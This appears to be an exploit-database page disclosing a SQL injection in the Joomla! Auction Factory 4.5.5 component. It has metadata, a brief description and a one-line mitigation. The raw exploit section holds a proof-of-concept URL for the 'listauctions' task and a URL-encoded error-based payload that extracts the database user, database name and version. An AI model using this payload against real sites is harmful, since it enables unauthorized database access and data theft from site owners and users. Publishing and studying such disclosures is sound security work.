header-logo
Suggest Exploit
vendor:
Auction Factory
by:
Ihsan Sencan
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Auction Factory
Affected Version From: 4.5.5
Affected Version To: 4.5.5
Patch Exists: YES
Related CWE: N/A
CPE: a:thephpfactory:auction_factory:4.5.5
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component Auction Factory 4.5.5 – ‘filter_order’ SQL Injection

A SQL injection vulnerability exists in Joomla! Component Auction Factory 4.5.5, which allows an attacker to execute arbitrary SQL commands via the 'filter_order_Dir' and 'filter_order' parameters in a 'listauctions' task. The vulnerability can be exploited by sending a malicious HTTP request to the vulnerable application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection
# Exploit Author: Ihsan Sencan
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/auction-factory/
# Version: 4.5.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC:  
# 1)
# http://localhost/[PATH]/index.php?option=com_auctionfactory&task=listauctions&filter_order_Dir=[SQL]&filter_order=[SQL]

%2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29